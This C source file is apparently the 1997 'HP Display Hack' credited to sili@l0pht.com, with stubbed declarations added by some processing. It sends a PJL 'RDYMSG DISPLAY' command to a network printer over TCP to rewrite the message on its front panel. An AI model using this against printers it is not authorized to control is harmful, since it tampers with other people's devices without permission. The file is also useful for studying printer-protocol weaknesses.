
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_zero; int sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {int h_length; int h_addr; int h_addrtype; } ;
typedef int dest_addr ;


 int AF_INET ;
 int PORT ;
 int SOCK_STREAM ;
 int bcopy (int ,char*,int ) ;
 int bzero (int *,int) ;
 int close (int) ;
 int connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int send (int,char*,int ,int ) ;
 int socket (int ,int ,int ) ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int strncat (char*,char*,int) ;

int main (int argc, char *argv[]) {

  int sockfd,len,bytes_sent;
  struct hostent *host;
  struct sockaddr_in dest_addr;
  char line[100];

  if (argc !=3) {
    printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]);
    printf("\tMessage can be up to 16 characters long\n");
    exit(1);
  }

  if ( (host=gethostbyname(argv[1])) == ((void*)0)) {
    perror("gethostbyname");
    exit(1);
  }

  printf ("HP Display hack -- sili@l0pht.com\n");
  printf ("Hostname:   %s\n", argv[1]);
  printf ("Message: %s\n",argv[2]);


  dest_addr.sin_family= host->h_addrtype;
  dest_addr.sin_port= htons(PORT) ;


  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

  bzero(&(dest_addr.sin_zero), 8);




  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
  }



  printf ("Connecting....\n");

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);}



  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
  strncat(line,argv[2],16);
  strcat(line,"\"\r\n\033%-12345X\r\n");





  bytes_sent=send(sockfd,line,strlen(line),0);

  printf("Sent %d bytes\n",bytes_sent);
  close(sockfd);
}
